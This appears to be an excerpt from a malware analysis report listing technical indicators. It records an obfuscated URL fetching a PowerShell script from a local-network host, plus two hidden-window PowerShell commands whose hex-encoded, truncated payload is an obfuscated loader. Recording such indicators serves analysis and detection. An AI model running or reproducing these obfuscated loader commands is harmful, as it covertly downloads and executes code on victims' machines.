Technical Information
- h+t+t+p+:+/+/+1+9+2+.+1+6+8+.+0+.+6+4+/+h+o+s+t+.+p+s+1
- '<LOCALNET>.0.64':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -wiNdOWsTy HIdDen -COm "(-jOiN(('7365542d7661526941626c4520634e67534d477077784b34472033333b7365542d5641526941626c65206a38474d4259694b6679396520343b5345742d5661526941424c6520487a4e47475241683077...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -wiNdOWsTy HIdDen -COm "(-jOiN(('7365542d7661526941626c4520634e67534d477077784b34472033333b7365542d5641526941626c65206a38474d4259694b6679396520343b5345742d5661526941424c6520487a4e47475241683077...